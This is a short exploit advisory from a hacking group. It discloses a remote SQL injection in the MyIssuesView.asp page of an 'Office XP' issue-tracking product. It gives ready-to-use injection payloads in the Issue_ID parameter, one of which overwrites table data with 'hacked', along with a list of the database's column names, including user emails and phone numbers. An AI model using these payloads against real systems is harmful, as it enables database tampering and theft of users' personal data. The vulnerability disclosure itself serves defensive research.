Aria-Security Team (Persian Security Network) http://forum.Aria-Security.com (ENGLISH FORUM!) -------------------------------------------------- Shoutz: Aura, Null, Kinglet Office XP Remote SQL Injection Vendor: vso-xp.com Vulnerable File: MyIssuesView.asp Original Adivosry: http://forum.aria-security.com/showthread.php?p=21 PoC: MyIssuesView.asp?Issue_ID=[SQL INJECTION] Examples: MyIssuesView.asp?Issue_ID=-1%20having%201=1-- MyIssuesView.asp?Issue_ID=-1 update QIssues set column='hacked';-- List of columns QIssues.Issue_ID,QIssues.UserID,QIssues.Date,QIssues.Synopsis,QIssues.Status,QIssues.Category,QIssues.Category_ID,QIssues.Status_ID,QIssues.Priority,QIssues.Staff_ID,QIssues.Description,QIssues.IssueDescription,QIssues.LastStatus_ID,QIssues.UserFullName,QIssues.StaffFullName,QIssues.StaffEmail,QIssues.Type,QIssues.Priority_ID,QIssues.Group_ID,QIssues.UserEmail,QIssues.GroupName,QIssues.UserPhone,QIssues.CloseDate,QIssues.BrowserAgent,QIssues.CompanyName,QIssues.FileName,QIssues.FilePath,QIssues.CustomFields,QIssues.CloseBy,QIssues.Age Aria-Security Team The-0utl4w
